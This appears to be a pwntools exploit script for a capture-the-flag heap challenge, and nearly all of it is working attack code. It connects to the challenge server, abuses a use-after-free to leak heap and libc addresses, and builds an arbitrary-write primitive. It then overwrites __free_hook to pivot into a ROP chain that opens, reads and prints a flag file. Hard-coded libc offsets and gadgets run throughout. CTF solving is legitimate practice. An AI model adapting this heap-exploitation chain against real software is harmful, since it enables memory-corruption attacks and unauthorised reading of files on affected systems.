#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from binascii import hexlify, unhexlify
import subprocess
import random
# Utils
def Encrypt(index, note=None, data=None):
    """Menu option 1: create the entry at *index* with the given note and text.

    Both *note* and *data* are handed to ``sendafter`` unchanged, so the
    ``None`` defaults are not usable in practice — callers always supply both.
    Talks over the module-level ``io`` connection.
    """
    io.sendlineafter('> ', '1')
    io.sendlineafter('Index: ', str(index))
    for prompt, payload in (('Note: ', note), ('Text: ', data)):
        io.sendafter(prompt, payload)
def Decrypt(index):
    """Menu option 2: ask the service to print entry *index*.

    Only sends the request; whatever the service prints is left on the
    module-level ``io`` connection for the caller to read.
    """
    for prompt, line in (('> ', '2'), ('Index: ', str(index))):
        io.sendlineafter(prompt, line)
def Edit(index, newnote=None, newdata=None):
    """Menu option 3: replace the note and text of the entry at *index*.

    As with ``Encrypt``, both payloads are sent verbatim with ``sendafter``,
    so the ``None`` defaults must not be relied on. Uses the module-level
    ``io`` connection.
    """
    io.sendlineafter('> ', '3')
    io.sendlineafter('Index: ', str(index))
    for prompt, payload in (('New note: ', newnote), ('New text: ', newdata)):
        io.sendafter(prompt, payload)
def Delete(index):
    """Menu option 4: remove the entry at *index* via the module-level ``io``."""
    for prompt, line in (('> ', '4'), ('Index: ', str(index))):
        io.sendlineafter(prompt, line)
def Arbwrite(what, where, heap_base):
    """Fixed menu sequence intended to place the 8-byte value *what* at *where*.

    Built entirely from ``Encrypt``/``Delete``/``Edit`` over the module-level
    ``io`` connection. ``heap_base + 0xe80`` is a build-specific heap offset
    the sequence depends on; the layout it assumes is not visible in this
    file — confirm it against the target binary before reuse. Call order is
    significant and must not be changed.
    """
    scratch = heap_base + 0xe80
    for idx in (0, 1):
        Encrypt(idx, note='A', data='A')
    for idx in (1, 0):
        Delete(idx)
    Edit(0, newnote=p64(scratch), newdata='A')
    Encrypt(0, note='A', data='A')
    Encrypt(0, note=p64(where), data='A')
    Edit(2, newnote=p64(what), newdata='A')
# Addr
# Offsets relative to the libc base of the build the challenge shipped with.
# They are specific to that one libc binary and cannot be verified from this
# file alone — re-derive them for any other build.
libc_leak_offset = 0x001ECF60
__free_hook = 0x001EEB28
setcontext = 0x00058_0A0
# Gadgets
# Gadget offsets relative to the libc base, for the same libc build as the
# offsets above. Each is an address of a short instruction sequence inside
# libc; their correctness depends on the exact binary — confirm before reuse.
L_SYSCALL = 0x000E_7559
L_POP_RDI = 0x0015_B427
L_POP_RSI = 0x0014_D1DA
L_POP_RDX = 0x0016_2866  # pop rdx ; pop xxx ; ret
L_POP_RAX = 0x0011_2CFB
# Hack
def Hack():
    """Run the interaction sequence over the module-level ``io`` connection.

    Steps as written: three ``Encrypt`` calls; ``Delete(0)`` then
    ``Decrypt(0)``, whose printed value is parsed as hex to derive
    ``heap_base``; an ``Edit``/``Encrypt``/``Encrypt`` run and ``Decrypt(2)``,
    parsed the same way to derive ``libc_base``; a series of ``Arbwrite``
    calls; ``Delete(5)``; and finally one ``io.send`` of ``L_ROP``.

    Every numeric offset below is hard-coded for one specific build of the
    challenge binary and its libc and will not carry over to another build —
    confirm them before reuse. The statement order is load-bearing.
    """
    global io
    Encrypt(0,note='A'*0x8,data='A'*0x8) #0
    Encrypt(1,note='A'*0x8,data='B'*0x8) #1
    Encrypt(2,note='B'*0x8,data='C'*0x8) #2
    Delete(0)
    Decrypt(0)
    # The service prints the entry hex-encoded after '): '; the decoded 8 bytes
    # are read as a little-endian integer. 0xf00 is the assumed distance from
    # that value to the heap start for this build — TODO confirm.
    io.recvuntil('): ')
    heap_base = u64(unhexlify(io.recvline().strip()))-0xf00
    print(hex(heap_base))
    Edit(0,newnote=p64(heap_base+0xe80),newdata='\n')
    Encrypt(0,note='A'*0x8,data='A')
    Encrypt(3,note=p64(heap_base+0x650),data='A')
    Decrypt(2)
    # Same parsing as above; libc_leak_offset (module level) is the assumed
    # distance of the printed value from the libc base for this build.
    io.recvuntil('): ')
    libc_leak = u64(unhexlify(io.recvline().strip()))
    libc_base = libc_leak - libc_leak_offset
    print(hex(libc_base))
    Encrypt(5,'A','A') #heap base + 0x1130
    #0x00154930: mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20] ; (1 found)
    # Each Arbwrite is intended to store the 8-byte value `what` at address
    # `where` (see Arbwrite above). The values and their order are fixed for
    # this build; do not reorder.
    Arbwrite(what=heap_base+0x1168,where=heap_base+0x1178,heap_base=heap_base)
    Arbwrite(what=libc_base+setcontext+61,where=heap_base+0x1188,heap_base=heap_base)
    Arbwrite(what=heap_base+0x2000,where=heap_base+0x1168+0xa0,heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x1160+0xb0,heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RDI,where=heap_base+0x2000+0x8,heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RSI,where=heap_base+0x2000+0x18,heap_base=heap_base)
    Arbwrite(what=heap_base+0x2000,where=heap_base+0x2000+0x20,heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RDX,where=heap_base+0x2000+0x28,heap_base=heap_base)
    Arbwrite(what=0x1000,where=heap_base+0x2000+0x30,heap_base=heap_base)
    Arbwrite(what=0x1000,where=heap_base+0x2000+0x38,heap_base=heap_base)
    Arbwrite(what=libc_base+L_SYSCALL,where=heap_base+0x2000+0x40,heap_base=heap_base)
    Arbwrite(what=libc_base+0x154930,where=libc_base+__free_hook,heap_base=heap_base)
    Delete(5)
    # Final payload: a NUL-padded 0x48-byte path string followed by packed
    # addresses computed from libc_base and the gadget constants at module
    # level. Sent raw with io.send (no trailing newline).
    L_ROP = b'/home/ctf/flag.txt\0'.ljust(0x48,b'\0')+\
    p64(libc_base+L_POP_RDI)+p64(heap_base+0x2000)+\
    p64(libc_base+L_POP_RSI)+p64(0)+\
    p64(libc_base+L_POP_RDX)+p64(0x100)+p64(0)+\
    p64(libc_base+L_POP_RAX)+p64(0x2)+\
    p64(libc_base+L_SYSCALL)+\
    p64(libc_base+L_POP_RDI)+p64(3)+\
    p64(libc_base+L_POP_RSI)+p64(heap_base)+\
    p64(libc_base+L_POP_RAX)+p64(0)+\
    p64(libc_base+L_SYSCALL)+\
    p64(libc_base+L_POP_RAX)+p64(1)+\
    p64(libc_base+L_POP_RDI)+p64(1)+\
    p64(libc_base+L_SYSCALL)
    io.send(L_ROP)
# Pwn
def main():
    """Entry point: open the connection as the module-level ``io``, run ``Hack``, then hand the session to the user."""
    global io
    # io = process('./chall')
    io = remote('challs.xmas.htsp.ro', 2007)
    Hack()
    io.interactive()


if __name__ == '__main__':
    main()